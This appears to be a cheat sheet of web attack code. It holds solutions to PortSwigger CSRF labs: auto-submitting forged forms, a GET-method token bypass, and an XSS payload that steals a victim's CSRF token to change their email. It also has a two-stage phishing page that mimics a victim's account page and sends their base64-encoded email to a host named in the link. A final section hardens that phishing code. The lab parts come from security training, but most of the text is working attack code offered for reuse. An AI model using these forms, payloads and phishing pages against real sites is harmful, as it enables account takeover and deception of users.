JavaScript Crafting
PSG CSRF 1: No validation
<!-- Lab 1: the endpoint has no CSRF token at all, so a cross-site POST carrying the attacker's email is accepted with the victim's session cookie -->
<form method="POST" action="https://0a3700f504731a4780bc0d2500a000f6.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="ttttt@test.com">
</form>
<script>
// Auto-submit as soon as the victim loads the hosted page
document.forms[0].submit();
</script>
PSG CSRF 2 : CSRF request method validation bypass using GET request instead of POST
<!-- Lab 2: the token is validated only on POST requests. No method attribute means GET, so the parameters travel in the query string and the check is skipped -->
<form action="https://0a3200e70330e7bb86d263eb00300092.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="wqwqqqqe@dwa.com" />
<!-- the attacker's own token from their session; it is not validated on GET and can be left out -->
<input type="hidden" name="csrf" value="57wADTL15Fs0pWIwqejKzreJVbVp80fO" />
<input type="submit" value="Submit request" />
</form>
<script>
// Auto-submit on load; the submit button is only a fallback
document.forms[0].submit();
</script>
XSS to CSRF: changing email
<script>
// Stored XSS payload. It runs in the victim's origin, so the same-origin request to
// /my-account carries their session cookie and returns their page, CSRF token included.
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/my-account', true);
req.send();
function handleResponse() {
  // Pull the token out of the hidden input rendered in the change-email form
  var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
  var changeReq = new XMLHttpRequest();
  changeReq.open('post', '/my-account/change-email', true);
  // Without this header XHR sends a string body as text/plain
  changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  changeReq.send('csrf=' + token + '&email=' + encodeURIComponent('t3st@test.com'));
}
</script>
Fetch the account page (/my-account) and extract the CSRF token from the response.
Make the POST request to /my-account/change-email with that token.
Remember to supply every parameter the legitimate request carries (copy them from the POST captured in Burp).
CSRF: placing email obtained from parameter and redirecting to another host
<script>
// Landing page. The victim's link carries ?email=<victim email>&url=<second-stage page>.
function onWindowLoad() {
  const urlParams = new URLSearchParams(window.location.search);
  const email = urlParams.get('email');
  const destination = urlParams.get('url');
  // One request to the destination host so it learns the page was opened
  if (destination) {
    fetch(destination);
  }
  // Show the victim their own address so the page looks like their account page
  // (gf-user is the id of the display element in this page's markup)
  var outputCdc = document.getElementById("gf-user");
  if (outputCdc && email) {
    outputCdc.innerText = email;
  }
}
window.onload = onWindowLoad;

// Wired to the Proceed button's onclick
function redirected() {
  const urlParams = new URLSearchParams(window.location.search);
  const destination = urlParams.get('url');
  const email = urlParams.get('email');
  // base64-encode (not encrypt) the email; btoa throws on characters outside Latin-1
  const emailb = btoa(email);
  if (destination) {
    // Assumes url already contains a query string, so "&" is the right separator
    window.location.href = destination + "&key=" + emailb;
  } else {
    window.location.href = 'defaultPage.html';
  }
}
</script>
Obtain email and url from the link the victim opened.
url will be used as the redirect host.
Place the value of email into the input box as a placeholder (to trick the victim into thinking it is the legitimate website).
When the victim presses the Proceed button, they are redirected to url + key, where key is their email base64-encoded (encoded, not encrypted: anyone who sees the URL can reverse it with atob).
CSRF placing email obtained from parameter
<script>
// Second-stage page, reached through the redirect above with ?key=<base64 email>
window.onload = function() {
  const urlParams = new URLSearchParams(window.location.search);
  const emailb = urlParams.get('key');
  if (!emailb) {
    return; // no key: leave the form blank instead of throwing inside atob()
  }
  const email = atob(emailb); // base64-decode the victim's email
  // emailkau and displayName are the ids of the input and label in this page's form markup
  const inpele2 = document.getElementById('emailkau');
  const inpele3 = document.getElementById('displayName');
  inpele2.value = email;
  inpele3.textContent = email;
};
</script>
Requires the victim's base64-encoded email in the key parameter. btoa() encodes to base64 and atob() decodes it; base64 is an encoding, not encryption, so the key is readable by anyone who sees the URL.
Pass the decoded value into the email field as its pre-filled value to trick the victim.
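The two pages above share the key encoding and the redirect construction, and both have edge cases: btoa() throws on any character outside Latin-1, atob() throws when the key is missing or malformed, and appending "&key=" by string concatenation only works when url already carries a query string. The helpers below are an added example, not the page's code: they encode the email as UTF-8 before base64, decode defensively, and build the second-stage URL with the URL API so key is appended correctly either way. They run in browsers and in Node 16+, which both expose btoa, atob, TextEncoder, TextDecoder, URL and URLSearchParams as globals; the hostnames in the usage are constructed for the example.

```javascript
// Added example, not code from the page: UTF-8-safe key encoding and
// URL-API based redirect construction for the two pages above.

// email -> base64 "key" carried in the redirect. Encode to UTF-8 bytes first,
// because btoa() only accepts a Latin-1 binary string.
function encodeKey(email) {
  const bytes = new TextEncoder().encode(email);
  let binary = '';
  for (const b of bytes) binary += String.fromCharCode(b);
  return btoa(binary);
}

// "key" -> email. Returns null for a missing or malformed key instead of
// letting atob() throw and kill the page's onload handler.
function decodeKey(key) {
  if (typeof key !== 'string' || key.length === 0) return null;
  let binary;
  try {
    binary = atob(key);
  } catch (e) {
    return null;
  }
  const bytes = Uint8Array.from(binary, (ch) => ch.charCodeAt(0));
  return new TextDecoder().decode(bytes);
}

// Second-stage URL: the destination from the "url" parameter plus key=<base64 email>.
// searchParams.set() picks "?" or "&" itself and percent-encodes the padding "=".
function buildRedirect(destination, email) {
  const target = new URL(destination); // throws on a relative or invalid URL
  target.searchParams.set('key', encodeKey(email));
  return target.toString();
}

// First page: read email and url from the query string the victim's link carried
// and produce the redirect target, or null if either parameter is missing.
function redirectFromSearch(search) {
  const params = new URLSearchParams(search);
  const email = params.get('email');
  const destination = params.get('url');
  if (!email || !destination) return null;
  return buildRedirect(destination, email);
}

// Second page: recover the email from its own query string (null if absent).
function emailFromSearch(search) {
  return decodeKey(new URLSearchParams(search).get('key'));
}

// Usage in the first page's Proceed handler (constructed destination host):
//   const next = redirectFromSearch(window.location.search);
//   window.location.href = next || 'defaultPage.html';
// and in the second page's onload:
//   const email = emailFromSearch(window.location.search);
```

In the browser, redirectFromSearch(window.location.search) replaces the concatenation in redirected(), and emailFromSearch(window.location.search) replaces the bare atob() call in the second page; a missing key then yields null and the form is simply left blank.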